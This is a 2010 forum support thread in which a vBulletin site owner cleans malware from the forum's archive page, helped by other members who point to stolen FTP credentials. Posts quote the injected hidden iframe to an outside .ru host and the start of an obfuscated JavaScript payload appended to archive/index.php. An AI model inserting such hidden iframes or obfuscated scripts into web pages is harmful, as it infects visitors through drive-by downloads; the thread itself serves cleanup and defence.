Announcement

Collapse
No announcement yet.

Malware report on archive.

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Malware report on archive.

    Hi all
    My site is running 3.7.2. I have had an email from google saying there is malware on the /archive. When i look at the webmaster tools in the google account this is the errors i find.

    Code:
    URL: http://www.myforum.com/archive/index.php?t-8701.html
    Last checked: September 8, 2010
    
    
      Suspected injected code Instances 
    <iframe src='http://z145235.infobox.ru/go.php?sid=2' width='
    1' height='1' style='visibility: hidden;'>
    and also

    Code:
    URL:http://myforum.com/archive/
    Last checked: September 8, 2010 
    
    
      Suspected injected codeInstances<iframe src='http://z145235.infobox.ru/go.php?sid=2' width='
    1' height='1' style='visibility: hidden;'>
    How do i get rid of this and what is the t-8701.html at the end of the archive/index.php

    Thanks for your help

  • #2
    Ok... i have looked at the archive/index.php file and there looks to be non vbulletin code at the bottom. I'll post the last bit of code of what i believe to be vbulletin and the start of the offending script .... could you please confirm if i am correct and which is the exact last line of vb code.

    Code:
        $output .= "<div id=\"content\">\n";
        $output .= $error_message;
        $output .= "</div>\n";
    }
     
    ($hook = vBulletinHook::fetch_hook('archive_complete')) ? eval($hook) : false;
     
    $output .= "
    <div id=\"copyright\">$vbphrase[vbulletin_copyright]</div>
    </div>
    </body>
    </html>";  IS THIS THE LAST LINE OF VB CODE
     
    if (defined('NOSHUTDOWNFUNC'))
    {
        exec_shut_down();
    }
     
    echo $output;
     
    ($hook = vBulletinHook::fetch_hook('archive_complete_postoutput')) ? eval($hook) : false;
     
    /*======================================================================*\
    || ####################################################################
    || # Downloaded: 11:07, Fri Jun 27th 2008
    || # CVS: $RCSfile$ - $Revision: 26358 $
    || ####################################################################
    \*======================================================================*/
    ?><body><iframe src='http://z145235.infobox.ru/go.php?sid=2' width='1' height='1' style='visibility: hidden;'></iframe>
    var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;}
    return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;}
    return l.value;},j:function(){var l=i.i.i.i(i.l.i.i('.75.............

    Comment


    • #3
      The last line of original vBulletin code is ?> at the bottom after the blurb of downloaded information. The <body> and iframe tags that come after are the third party code that has been injected into your files.

      Comment


      • #4
        Thanks Zachery .... i'll delete it once i'm home. Has this most likely been injected via a hack?

        Comment


        • #5
          Most common is by a worm/troyan that infects ftp programs. So make sure you scan your pc very well. Latest virus definitions & multiple antivirus scanners. Change your ftp password. Then download vbulletin from the members area. Unpack and upload that.
          Also consider if there are other pc's that could be infected.
          I buy 420 forums

          Comment


          • #6
            If you are using vBSEO then see this patch to a security flaw:
            Security Bulletin - vBSEO 3.5.2 Released
            I buy 420 forums

            Comment


            • #7
              Originally posted by Alfa1 View Post
              If you are using vBSEO then see this patch to a security flaw:
              Security Bulletin - vBSEO 3.5.2 Released
              Thanks for the reply.

              I am not using vbseo.

              I have deleted the script and all the junk has been removed from the footer of the archive index page.
              I am still getting a warning from Kasperski saying there is a malicious script on the page. If i open the page on 'view source' i can see the offending script but i dont know where to delete it .... I cant see it on other pages when i view source so it must be in a specific template maybe. Can some one take a look at the code and tell me where i need to navigate to to edit it out. Thanks. The code in red is the part i need to remove.
              Code:
              <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
              <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
              <head>
               <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
               <meta name="keywords" content="xxxxxxxxxxxxxxxxxxxxxxxxxx" />
               <meta name="description" content="A discussion forum for pipe and drum bands across the globe, oh, and a load of fun too  http://xxxxxxx.com/" />
               <title>Pipe Band Forum</title>
               <link rel="stylesheet" type="text/css" href="http://www.xxxxxxx.com/archive/archive.css" />
              </head>
              <body><iframe src='http://z145235.infobox.ru/go.php?sid=2' width='1' height='1' style='visibility: hidden;'></iframe>Yhis is the part i need to remove<div class="pagebody">
              <div id="navbar"><a href="http://www.xxxxxx.com/archive/index.php">Pipe Band Forum</a></div>
              <hr />
              <div class="pda"><a href="http://www.xxxxxxx.com/archive/index.php?pda=1" rel="nofollow">PDA</a></div>
              <p class="largefont">View Full Version: <a href="http://www.xxxxxxx.com/index.php">Pipe Band Forum</a></p>
              <div id="content">

              Comment


              • #8
                Ok... found it. It is still within the archive/index.php

                Comment


                • #9
                  Have you scanned all computers that have ftp access to the server?
                  I buy 420 forums

                  Comment


                  • #10
                    Yes, my home computers are clean but i remember that my work computer got infected with malware a few months ago and only malwarebytes would get rid of it.

                    Comment


                    • #11
                      eeek my index.php has been hacked again with a script.

                      Comment


                      • #12
                        This is mainly related with your server security. You shuld scan your server for malicious php scripts and additionally you should protect your chmod 777 folders.

                        Comment

                        widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                        Working...
                        X